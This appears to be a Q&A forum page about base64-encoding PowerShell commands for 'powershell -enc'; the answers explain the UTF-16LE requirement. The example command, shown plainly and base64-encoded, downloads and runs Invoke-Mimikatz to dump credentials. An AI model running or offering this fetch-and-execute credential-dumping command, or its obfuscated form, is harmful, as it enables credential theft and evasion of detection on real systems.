Reputation: 195
Powershell base64 encoding required
I want to execute base64 encoded commands in powershell. For example, I took a command from this github repo: https://gist.github.com/gfoss/ca6aa37f97fd400ff14f. Running the mimikatz one:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
If I run it straight in a powershell prompt, it works correctly. Checking the base64 encoded version, I see that it also works correctly:
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
However, Im not sure how that string was encoded. If I try to encode it in Linux, I get a different string (I just changed the quotes to prevent bash interpretating the $):
echo -e 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/Powe
rSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCreds; $m' | openssl enc -base64 -A
SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vUG93ZXJTaGVsbE1hZmlhL1Bvd2VyU3Bsb2l0L21hc3Rlci9FeGZpbHRyYXRpb24vSW52b2tlLU1pbWlrYXR6LnBzMSIpOyAkbSA9IEludm9rZS1NaW1pa2F0eiAtRHVtcENyZWRzOyAkbQo=
This encoding fails when I try to run it with powershell -enc.
What encoding should I use to make the string completely compatible with powershell?
Upvotes: 4
Views: 12805
Answers (2)
Reputation: 174425
PowerShell expects the base64 string to be Unicode encoded - and Unicode is Windows-lingo for little-endian UTF-16.
You can use iconv to convert to UTF-16LE if you need to encode a PowerShell command from a linux shell without access to .NET:
iconv -f ASCII -t UTF-16LE filename.txt |base64 -w 0
Upvotes: 6
Reputation: 72151
use one from the powershell examples?
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("command_goes_here"))
Upvotes: 3
Related Questions
- How to achieve Base64 URL safe encoding for binary hash string in Powershell?
- Decoding base64 with powershell
- How to run base64 code in powershell with ascii?
- How to execute Base64 encoded powershell function?
- Bash base64 has an additional character instead of an equals versus powershell
- Decode Base64 String in Powershell
- Powershell not decoding base64 command correctly
- check the string is Base64 encoded in PowerShell
- PowerShell trouble with base64 encoding
- Base64 encoding in Powershell